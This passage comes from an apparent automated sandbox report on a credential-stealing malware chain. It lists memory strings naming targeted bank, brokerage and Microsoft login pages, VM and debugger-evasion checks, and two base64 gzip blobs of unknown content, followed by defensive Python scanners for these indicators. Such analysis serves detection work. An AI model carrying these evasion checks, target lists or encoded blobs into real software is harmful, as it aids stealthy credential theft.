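                  if t["time_ms"] is not None and t["time_ms"] != INFINITE_MS]
        loops = {tid: {"count": t["count"],
                       "mean_ms": round(t["time_ms"] / t["count"]) if t["time_ms"] else None}
                 for tid, t in tids.items() if t["count"] and t["count"] > 30}
        report[exe] = {
            "total_ms": sum(finite),
            "over_threshold": sum(1 for ms in finite if ms >= THRESHOLD_MS),
            "infinite_tids": sorted(tid for tid, t in tids.items() if t["time_ms"] == INFINITE_MS),
            "loops": loops,
        }
    return report


def triage(lines=REPORT_LINES):
    return assess(parse_sleep_lines(lines))


if __name__ == "__main__":
    for exe, facts in triage().items():
        print(exe, facts)
```

The loops entry is the useful output: skotes.exe runs one thread on a 2 s cadence and another on a 30 s cadence, while the two infinite waits belong to processes that never resume on their own.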
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, file.exe, 00000000.00000003.2221768283.0000000000A11000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336317331.0000000000A11000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2931287187.00000121572AA000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.0000000001549000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.0000000001578000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.000000000084F000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.000000000087E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2937356698.0000029B42210000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2930456761.0000029B41A4A000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.0000000001514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: firefox.exe, 0000001C.00000002.2937358038.000001215761B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: firefox.exe, 0000001C.00000002.2931287187.00000121572AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWYL
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPP=
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: YQEN9A9QU4P1VROBPV5YS.exe, YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2487281362.0000000000717000.00000040.00000001.01000000.00000006.sdmp, 99Q4Y3O9GBOXYTDVM9GPHI.exe, 99Q4Y3O9GBOXYTDVM9GPHI.exe, 00000004.00000002.2462253080.0000000000723000.00000040.00000001.01000000.00000009.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766477851.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000B.00000002.2785411253.0000000000E73000.00000040.00000001.01000000.0000000C.sdmp, b76bb5cee7.exe, 0000001D.00000002.2962842335.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000002.3009618076.00000000007B7000.00000040.00000001.01000000.00000017.sdmp, KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe, 00000020.00000002.2947907757.00000000006D3000.00000040.00000001.01000000.00000019.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware{
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.000000000621A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: efe6fe4127.exe, 0000000C.00000003.2822365561.00000000062E2000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2822017373.00000000062DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: H4sIAAAAAAAAAN1ca2/juJL9K4t8HTmj9yMX+8Fxko5n8vDETvruvX0RyBJtK5EijSQn7R3Mf99TpJ62JbtngcXFAoOeSKwqFovFqlMk5T/ORnG0CJbjq+zs4uyPb2fXo+m3s4tvZ5PB00CRbdWw5IEyUBRpMrga6Kpm2wN1YH47k0DqL1lB+3dQqLKsaGhUZKl4YRi2BmateFY02zHxbIhn2dY1E60Ds3h2FFs3IcAoGGTLcNAdRBQUIJEVg/ovCXRTUepndOmYat2jrNqqBuWNgaGWfVqqYuH/A7XSSjYMFTLKZ4wZnSoDq3yWLctBu1VqqSoq0Tvls2kackMH2VC0hk6yY6kauAdK1YEOJdCBUz5rjqnXCsiOI9ty3S7bjmWQ0fkccAYVJE2NYXm7oaGpGZZBZqsZFINmRi/NhkE1JoKGaDoNszmOabSeDdNsdoAhqa2JxMTaA32gVAQwqd4QAI0UvWkTXdZhkfoZE6U0TaBamt16Vgy7Kc+2bWdgVDaVbdMg11EGdjlGh/5rjBlWtPTGGGxHNbizVc+K4jRUVDSTT3vVbplmc1ptQzHMhkq26tgGqaRUL+CemIWyQ90yoB9UqAgwD2rDipajW1qjB902uTNXg7QsQ2sxWAq3YukomCXHGWjQSrFLQ1myYjesoGsa962KwFIMp+UakCJDy6odhtAaM2XJMqa+HpVhGlpTBxNKtWbKVFWnXk2yIcO0TXrFkVXy1YpAk83mIA1b0dWmADin2Ry0amE1qdpAr8eo0kxiMuSSRsf0NpQyVNXQyV9LAsQESKgDDWxvI+5plRl0mqyGVphMRWs8q6am0mSrpUR0YjkNNeEv5G7awCnfaJaJwFQPjJtiAJ5SpmbKttIMZpYu80BSdSqT7Rsuq+o8GtZ9WpgqUKjFMBRL1uXGutdkzajoHcuBUZyBXTwqKixgDQxyV54KHBvuiWWsly+og4Ep/POJh2vbgHq2cPEnsU5NpTT0E7eb7hgDW4yBv9DhxgOKJnbxBmnBgRS1lGtbWAgU/kzxaGoyOahRPGoy5RS4kFALDm+SUrolLecKY4quXOi6Zcu6pL3Jy6Vumhe6ptiWJaUsY/k8iJZEIJuy5CmBjUiiXuiqqUPlzySOMjdXXw0ZJOQE0tubykzHhgxVtWxFchxjpSH0oB0Ly5Qc/22OWXDQhwVrS/OFt7Rs1cIzQpwp5c7vqRsFazcP4oit3SB0N3m8CMIQFI7hKBIWmEYBmHo0TEVic19bKhaNwjAR3fJkEMaks+aAVJrLylug2cYF9Y8OAmWpLk1ZJwU0w5GcxYItHRoTsgYWBNMsF2tKJXrbBj/G763c/PcNSwOWvRqvwTqBZTLo9/oZ5KvXlPlByrz8dZOGGcQgucCWvqvNNT5O3VEcyTdt31cd6tZQHZiOzQcZC8E22ETZKkgudAP+oUn2G+KcQQbBErMtKVCZBX1tsjmSu2SuFLZCAqXhI9FKzFE906Z2Be2GpMiub+uyTB2beHZ83XMdHeNHIAN/4LMoDxZbf05vsAqlTzcMWZ5kn2EQvW8S382ZMJYjBW++Y1oatCZgYUqKp9u6TaNSIF2TEDvtQNfQGaUsS7L0JVKfbZGyWA+S5rE3OIx9oWGlORaMqS90h6xgIArp0pvuywtTd7hyCA1zsj5AzYXmAOlYkuN5JpKphnYFwV7y48/ITdP4M/PSOAzJ/HkaLJcsjdjnhQbDyaoUAa+FMRwoWhJBvMnzeLkMaVCYG1NaWHN/aSrkxVjgiuRb9tsS8Q4WhQcbkim7iMoyOZgJl5OYrQOnOTSVgGNwOB/E3uIC6RH4THKNpfamWGBHPLBt6Lhm3xM34g7ygXlCorNUKYPh8ZZ5braau967FwbeO5o1pHIsdubrKoaNNYEeMvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg
Source: firefox.exe, 0000001C.00000002.2937948375.0000012157700000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareh
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000001C.00000002.2937948375.0000012157700000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2937356698.0000029B42210000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: firefox.exe, 0000001C.00000002.2937948375.0000012157700000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: firefox.exe, 00000021.00000002.2937356698.0000029B42210000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: efe6fe4127.exe, 0000000C.00000003.2937020002.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2935211964.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2961367554.00000000062E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wV7y48/ITdP4M/PSOAzJ/HkaLJcsjdjnhQbDyaoUAa+FMRwoWhJBvMnzeLkMaVCYG1NaWHN/aSrkxVjgiuRb9tsS8Q4WhQcbkim7iMoyOZgJl5OYrQOnOTSVgGNwOB/E3uIC6RH4THKNpfamWGBHPLBt6Lhm3xM34g7ygXlCorNUKYPh8ZZ5braau967FwbeO5o1pHIsdubrKoaNNYEeMvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: efe6fe4127.exe, 0000000C.00000003.2874295059.00000000062E4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2921130845.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2869175030.00000000062E4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2835595634.00000000062E4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2837176664.00000000062E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.0000000001578000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2487281362.0000000000717000.00000040.00000001.01000000.00000006.sdmp, 99Q4Y3O9GBOXYTDVM9GPHI.exe, 00000004.00000002.2462253080.0000000000723000.00000040.00000001.01000000.00000009.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766477851.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000B.00000002.2785411253.0000000000E73000.00000040.00000001.01000000.0000000C.sdmp, b76bb5cee7.exe, 0000001D.00000002.2962842335.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000002.3009618076.00000000007B7000.00000040.00000001.01000000.00000017.sdmp, KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe, 00000020.00000002.2947907757.00000000006D3000.00000040.00000001.01000000.00000019.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070F17E rdtsc 3_2_0070F17E
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059B7BA LdrInitializeThunk, 3_2_0059B7BA
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Memory allocated: page read and write | page guard Jump to behavior
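The window class names and SoftICE device names in this section, together with the VBOX__, VMwareVMware and Oreans/WinLicense strings in the memory dumps of the previous section, are static indicators that can be hunted for directly in a process dump. The scanner below is an added example for this report, not Joe Sandbox or Oreans code: its indicator lists are taken from the lines above, its sample buffer is constructed inline, and it searches both ASCII and UTF-16LE because FindWindowW and CreateFileW take wide strings. Two caveats it encodes: "VMwareVMware" is the 12-byte CPUID hypervisor vendor ID and carries no terminator (the dumps show "VMwareVMware{"), and "Hyper-V RAW" is a Winsock catalog entry (the firefox.exe dump shows it beside mswsock.dll and a provider GUID) that is not evidence of virtualization on its own, so it is deliberately left out of the VM indicators.

```python
"""Scan a memory dump for the anti-analysis strings recorded in this report.

Added example for this report (not Joe Sandbox or Oreans code).  The indicator
lists are copied from the report lines; SAMPLE_DUMP is constructed inline.
"""
import re
from collections import defaultdict

# technique -> (indicator strings, case-insensitive?, require string terminator?)
INDICATORS = {
    # Window class/title names probed via FindWindow.  The report lowercases
    # them (the real OllyDbg class is "OLLYDBG"), so compare case-insensitively.
    "analysis_tool_window": ([
        "regmonclass", "filemonclass", "procmon_window_class", "gbdyllo", "ollydbg",
        "process monitor - sysinternals: www.sysinternals.com",
        "registry monitor - sysinternals: www.sysinternals.com",
        "file monitor - sysinternals: www.sysinternals.com",
    ], True, True),
    # SoftICE driver devices.  The report shows bare names; an actual CreateFile
    # uses the \\.\ device prefix, which is required here so that "SICE" does
    # not fire on ordinary words ("Justice").
    "softice_device": ([r"\\.\NTICE", r"\\.\SICE", r"\\.\SIWVID"], True, True),
    # VirtualBox ACPI table key and the VMware CPUID hypervisor vendor string.
    # The vendor string is 12 raw register bytes with no terminator (the report
    # shows "VMwareVMware{"), so no terminator check for this group.
    "vm_artifact": ([r"HARDWARE\ACPI\DSDT\VBOX__", "VMwareVMware"], False, False),
    # Runtime strings of the Oreans protector (Themida/WinLicense).
    "oreans_protector": (["Oreans.vxd", r"Software\WinLicense"], False, True),
}


def _patterns(text, case_insensitive, terminated):
    """Compile the ASCII and UTF-16LE forms of one indicator."""
    flags = re.IGNORECASE if case_insensitive else 0
    narrow = re.escape(text.encode("ascii"))
    wide = re.escape(text.encode("utf-16-le"))
    if terminated:  # the next character must not continue an identifier
        narrow += rb"(?![0-9A-Za-z_])"
        wide += rb"(?![0-9A-Za-z_]\x00)"
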